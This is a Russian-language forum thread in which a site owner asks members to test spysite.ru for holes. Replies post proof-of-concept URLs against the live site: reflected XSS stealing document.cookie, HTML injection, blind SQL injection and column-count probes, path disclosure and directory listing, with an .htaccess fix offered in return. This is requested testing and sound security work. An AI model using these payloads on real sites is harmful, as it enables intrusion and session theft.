Просьба огромная проверить на взлом
www.spysite.ru (http://www.spysite.ru)

Я сам писал коды, но возможно чтото упустил

С Уважением.

1) http://www.spysite.ru/forum/admin.php
без ограничения на кол-во попыток и картинки.
2) http://www.spysite.ru/forum/tools.php?event=find&find=ok'
раскрытие пути.

1) http://www.spysite.ru/forum/admin.php
без ограничения на кол-во попыток и картинки.
2) http://www.spysite.ru/forum/tools.php?event=find&find=ok'
раскрытие пути.

Принято

xss

http://www.spysite.ru/shop.php?shop=%C2%E8%E4%E5%EE%EA%E0%EC%E5%F0%FB%20 Panasonic&sort=%F7%B8%F0%ED%EE-%E1%E5%EB%FB%E5%22%3E%3Cscript%3Ealert()%3C/script%3E&type=%E1%E5%E7%20%EE%E1%FA%E5%EA%F2%E8%E2%E0


это что за нах? :) :)

http://spysite.ru/library.php

в сорсах пишется структура базы :))
<!-- SELECT * FROM library WHERE id=7 -->

есть результат посерьезнее но пока постить не буду :)

продолжение....

[САЙТ]

http://spysite.ru/contents/
http://spysite.ru/lib/
http://spysite.ru/setup/

http://spysite.ru/lib/review.php?article=1+and+(ascii(substring(VER
SION(),1,1))=51) :( версия 3 юнион не работает а получать данные с
таблицы особой охоты нет =)

http://spysite.ru/lib/review.php?article=1+order+by+7/* полей 7
http://www.spysite.ru/news.php?new=i7+order+by+5/* полей 5
ну и множество раскрытия путей =)
З.Ы. в низу страницы сбитые ссылки ну там "о нас" - ссылка на форум
и тд..


[ФОРУМ]
раскрытие путей
http://spysite.ru/forum/tools.php?event=givmepassword
http://spysite.ru/forum/tools.php?event=find&find=ok'

З.Ы. запрети ты листинг директорий.. =)

to halkfild
Спасибо. В понедельник буду править. Что касается кнопок внизу - знаю просто меняю дизайн. (но тож спасиб)

З.Ы. запрети ты листинг директорий.. =)

Ставлю .htacsess а сервак мне даже смотреть сайт не дает не только директории :mad:

Не подскажет кто нить че там писать то надо, чтобы все ок было

.htaccess

Options -Indexes

.htaccess

Options -Indexes

Респект

извените что сюда пишу,просто почему то темы я создаю,а они не появляются,вот проверьте мою игру плизз,она на движке от ИВ.но переделанная.

http://ladswar.com

извените что сюда пишу,просто почему то темы я создаю,а они не появляются,вот проверьте мою игру плизз,она на движке от ИВ.но переделанная.

http://ladswar.com

1)предмодерация
2)где баннер ачата?

1)предмодерация
2)где баннер ачата?

Тот сайт,я нашёл дизайнера,пока что переделываем дизайн!!!

Вот если можешь проверь этот проект,тоже мой,банер поставить не могу.
но я записал ссылку и т.д в инфу к себе в игре,вот смотри статус АДМИНИСТРАТОР и там ссылки античата

http://twog.lathost.lv/inf.php?2836

приходи поставлю тоже админа,если не веришь, :)

Spysite.Ru

/library.php?article=--><script>alert(document.cookie)</script>

/shop.php?shop=<br><h1><img%20src=http://anty611.jino-net.ru/antichat.ru.gif></h1><br"&sort=<br><h1>ANTICHAT.RU</h1><br"

http://www.spysite.ru/news.php?new=i12'

[pasкрытие путей]

http://spysite.ru/search.php?qwest[]=
http://spysite.ru/news.php?new[]=i3

http://spysite.ru/lib/kernel.php
http://spysite.ru/setup/forms.php
тут интересно, но ничего нормального выдавить не сложилось.. там инициализируется переменная может инклюд

/hsphere/local/home/spysite/spysite.ru/setup/forms.php

з.ы. в 4,5 постах этой темы описаны рабочие уязвимости
з.з.ы. зачем постить на проверку багов, если не исправлять то что найдено
з.з.з.ы. старайтесь смотреть, не писал ли кто-то эти уязвимости